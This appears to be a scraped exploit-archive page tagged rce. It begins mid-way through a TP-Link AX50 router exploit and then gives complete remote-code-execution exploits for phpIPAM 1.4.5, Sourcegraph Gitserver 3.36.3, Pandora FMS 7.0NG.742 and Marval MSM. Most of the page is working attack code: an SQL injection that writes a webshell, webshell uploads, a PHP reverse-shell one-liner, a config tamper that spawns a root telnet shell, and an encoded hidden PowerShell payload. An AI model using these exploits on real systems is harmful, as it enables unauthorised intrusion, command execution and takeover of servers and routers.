re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1)    else:      xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1)    with open(xml_path, 'w') as f:      f.write(xml_content)arg_parser = argparse.ArgumentParser()arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True)arg_parser.add_argument('-p', metavar='password', required=True)arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config')arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config')arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute')args = arg_parser.parse_args()client = WebClient(args.t, args.p)parser = Noneif not args.r:  print('[*] downloading config file ...')  filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'})  if not filepath:    sys.exit(-1)  print('[*] decrypting config file "%s" ...'%(filepath))  parser = BackupParser(filepath)  parser.decrypt_config()  print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path))if not args.b and not args.r:  filepath = '%s_modified'%(parser.decrypted_path)  os.rename(parser.decrypted_path, filepath)  parser.decrypted_path = os.path.abspath(filepath)  parser.encrypted_path = '%s.bin'%(filepath)  parser.modify_config(args.c)  print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path))if not args.b:  if parser is None:    parser = BackupParser('%s.bin'%(args.r.rstrip('/')))  print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path))  parser.encrypt_config()  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'})  timeout = data['data']['totaltime'] if data['success'] else 180  print('[*] uploading modified config file "%s"'%(parser.encrypted_path))  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')})  if not data['success']:    print('[!] unexpected response')    print(data)    sys.exit(-1)  print('[+] config file successfully uploaded')  print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))

TP-Link AX50 Remote Code Execution

phpIPAM version 1.4.5 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-04-10# Exploit Author: Guilherme '@behiNdyk1' Alves# Vendor Homepage: https://phpipam.net/# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5# Version: 1.4.5# Tested on: Linux Ubuntu 20.04.3 LTS#!/usr/bin/env python3import requestsimport argparsefrom sys import exit, argvfrom termcolor import coloredbanner = """█▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█   ▄█ ░ █░█ ░ █▀   █▀ █▀█ █░░ █   ▀█▀ █▀█   █▀█ █▀▀ █▀▀█▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█   ░█ ▄ ▀▀█ ▄ ▄█   ▄█ ▀▀█ █▄▄ █   ░█░ █▄█   █▀▄ █▄▄ ██▄█▄▄ █▄█   █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀█▄█ ░█░   █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄\n"""print(banner)parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE")parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True)parser.add_argument("-usr", type=str, help="Username to log in as", required=True)parser.add_argument("-pwd", type=str, help="User's password", required=True)parser.add_argument("-cmd", type=str, help="Command to execute", default="id")parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html")parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?")args = parser.parse_args()url = args.urlusername = args.usrpassword = args.pwdcommand = args.cmdpath = args.path# Validating urlif url.endswith("/"):  url = url[:-1]if not url.startswith("http://") and not url.startswith("https://"):  print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))  exit()def login(url, username, password):  """Takes an username and a password and tries to execute a login (IPAM)"""  data = {  "ipamusername": username,  "ipampassword": password  }  print(colored(f"[...] Trying to log in as {username}", "blue"))  r = requests.post(f"{url}/app/login/login_check.php", data=data)  if "Invalid username or password" in r.text:    print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))    exit()  else:    print(colored("[+] Login successful!", "green"))    return str(r.cookies['phpipam'])auth_cookie = login(url, username, password)def exploit(url, auth_cookie, path, command):  print(colored("[...] Exploiting", "blue"))  vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"  data = {  "subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",  "bgp_id": "1"  }  cookies = {  "phpipam": auth_cookie  }  requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies)  test = requests.get(f"{url}/evil.php")  if test.status_code != 200:    return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red"))  if "--shell" in argv:    while True:      command = input("Shell> ")      r = requests.get(f"{url}/evil.php?cmd={command}")      print(r.text)  else:    print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))    r = requests.get(f"{url}/evil.php?cmd={command}")    print(f"\n\n[+] Output:\n{r.text}")exploit(url, auth_cookie, path, command)

phpIPAM 1.4.5 Remote Code Execution

Sourcegraph Gitserver version 3.36.3 suffers from a remote code execution vulnerability.

    # Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)# Date: 2022-06-10# Exploit Author: Altelus# Vendor Homepage: https://about.sourcegraph.com/# Version: 3.63.3 # Tested on: Linux# CVE : CVE-2022-23642# Docker Container: sourcegraph/server:3.36.3# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3## Exploitation parameters:# - Exposed Sourcegraph gitserver# - Existing repo on sourcegraphimport jsonimport argparseimport requestsdef exploit(host, existing_git, cmd):    # setting sshCommand    data = {        "Repo" : existing_git,        "Args" : [            "config",            "core.sshCommand",            cmd        ]    }    res = requests.get(host+"/exec", json=data).text    if len(res) > 0:        print("[-] Didn't work: {}".format(res))        exit(0)    # setting fake origin    data = {        "Repo" : existing_git,        "Args" : [            "remote",            "add",            "origin",            "git@lolololz:foo/bar.git"        ]    }    res = requests.get(host+"/exec", json=data).text    if len(res) > 0:        print("[-] Didn't work: {}".format(res))        exit(0)    # triggering command using push    data = {        "Repo" : existing_git,        "Args" : [            "push",            "origin",            "master"        ]    }    res = requests.get(host+"/exec", json=data).text    print("[*] Finished executing exploit")parser = argparse.ArgumentParser()parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")parser.add_argument('--cmd', required=True, help="Command to run")args = parser.parse_args()host = args.gitserver_hostexisting_git = args.existing_gitcmd = args.cmdexploit(host, existing_git, cmd)

Sourcegraph Gitserver 3.36.3 Remote Code Execution

Pandora FMS version 7.0NG.742 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)# Date: 05/20/2022# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)# Vendor Homepage: https://pandorafms.com/# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz# Version: v7.0NG.742# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)# CVE: CVE-2020-5844# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.#!/usr/bin/env python3# Importstry:    import requestsexcept:    print(f"ERRORED: RUN: pip install requests")    exit()import sysimport timeimport urllib.parse# Class for colorsclass color:    red = '\033[91m'    gold = '\033[93m'    blue = '\033[36m'    green = '\033[92m'    no = '\033[0m'# Print UNICORD ASCII Artdef UNICORD_ASCII():    print(rf"""{color.red}        _ __,~~~{color.gold}/{color.red}_{color.no}        {color.blue}__  ___  _______________  ___  ___{color.no}{color.red}    ,~~`( )_( )-\|       {color.blue}/ / / / |/ /  _/ ___/ __ \/ _ \/ _ \{color.no}{color.red}        |/|  `--.       {color.blue}/ /_/ /    // // /__/ /_/ / , _/ // /{color.no}{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}    """)# Print exploit help menudef help():    print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code ExecutionUsage:  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]  python3 exploit-CVE-2020-5844.py -hOptions:  -t    Target host and port. Provide target IP address and port.  -u    Target username and password. Provide username and password to log in to Pandora FMS.  -p    Target valid PHP session ID. No username or password needed. (Optional)  -s    Reverse shell mode. Provide local IP address and port. (Optional)  -c    Custom command mode. Provide command to execute. (Optional)  -w    Web shell custom mode. Provide custom PHP file name. (Optional)  -h    Show this help menu.""")    exit()# Pretty loading wheeldef loading(spins):    def spinning_cursor():        while True:            for cursor in '|/-\\':                yield cursor    spinner = spinning_cursor()    for _ in range(spins):        sys.stdout.write(next(spinner))        sys.stdout.flush()        time.sleep(0.1)        sys.stdout.write('\b')# Run the exploitdef exploit(exploitMode, targetSess):    UNICORD_ASCII()    # Print initial variables    print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}")    print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}")    if targetSess is not None:        print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")    elif targetUser is not None:        print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}")        print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}")    if exploitMode == "command":        print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}")    if exploitMode == "web":        print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}")    if exploitMode == "shell":        print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}")        print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}")    print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}")    loading(15)    # If a PHPSESSID is not provided, grab one with valid username and password    if targetSess is None:        try:            getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"})            targetSess = getSession.cookies.get('PHPSESSID')            print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")            if "login_move" in getSession.text:                print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}")        except:            print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}")            exit()    # Set headers, parameters, and cookies for post request    headers = {    'Host': f'{targetIP}',    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874',    'Content-Length': '1289',    'Connection': 'close',    'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager',    'Upgrade-Insecure-Requests': '1',    'Sec-Fetch-Dest': 'document',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-User': '?1'    }    params = (        ('sec', 'gsetup'),        ('sec2', 'godmode/setup/file_manager')    )    cookies = {'PHPSESSID': targetSess}    # Basic PHP web shell with 'cmd' parameter    data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n'    # Try to upload the PHP web shell to the server    try:        response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False)    except:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}")        exit()    statusCode=response.status_code    if statusCode == 200:        print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}")    else:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}")        exit()    loading(15)    print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}")    loading(15)    # Print web shell location if in web shell mode    if exploitMode == "web":        print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}")        print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n")    # Run custom command on web shell if in command mode    if exploitMode == "command":        response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}')        print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n")        print(response.text)    # Run reverse shell command if in reverse shell mode    if exploitMode == "shell":        shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'"        try:            requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1)            print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n")        except:            print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n")    exit()if __name__ == "__main__":    args = ['-h','-t','-u','-p','-s','-c','-w']    modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'}    # Initialize starting variables    targetIP = None    targetPort = None    targetUser = None    targetPass = None    targetSess = None    command = None    localIP = None    localPort = None    webName = "unicord.php" # Default web shell file name    exploitMode = "web" # Default to web shell mode    # Print help if specified or if a target or authentication is not provided    if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):        help()    # Collect target IP and port from CLI    if args[1] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 1]:                raise            targetIP = sys.argv[sys.argv.index(args[1]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 2]:                raise            targetPort = sys.argv[sys.argv.index(args[1]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()    # Collect target username and password from  CLI    if args[2] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 1]:                raise            targetUser = sys.argv[sys.argv.index(args[2]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 2]:                raise            targetPass = sys.argv[sys.argv.index(args[2]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()    # Collect PHPSESSID from CLI, if specified    if args[3] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[3]) + 1]:                raise            targetSess = sys.argv[sys.argv.index(args[3]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}")            exit()    # Set reverse shell mode from CLI, if specified    if args[4] in sys.argv:        exploitMode = "shell"        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 1]:                raise            localIP = sys.argv[sys.argv.index(args[4]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 2]:                raise            localPort = sys.argv[sys.argv.index(args[4]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set custom command mode from CLI, if specified    elif args[5] in sys.argv:        exploitMode = "command"        try:            if sys.argv[sys.argv.index(args[5]) + 1] in args:                raise            command = sys.argv[sys.argv.index(args[5]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set web shell mode from CLI, if specified    elif args[6] in sys.argv:        exploitMode = "web"        try:            if sys.argv[sys.argv.index(args[6]) + 1] in args:                raise            if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]:                webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php"            else:                webName = sys.argv[sys.argv.index(args[6]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Run with default web shell mode if no mode is specified    else:        exploit(exploitMode,targetSess)

Pandora FMS 7.0NG.742 Remote Code Execution

Marval MSM version 14.19.0.12476 suffers from a remote code execution vulnerability.

    # Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)# Date: 27/5/2022# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: https://www.marvalnorthamerica.com/# Software Link: https://www.marvalnorthamerica.com/# Version: v14.19.0.12476# Tested on: Windows# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rcePOST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2Host: MSMHandler.ioCookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 456Origin: https://MSMHandler.ioDnt: 1Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstype=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true

Tag

#rce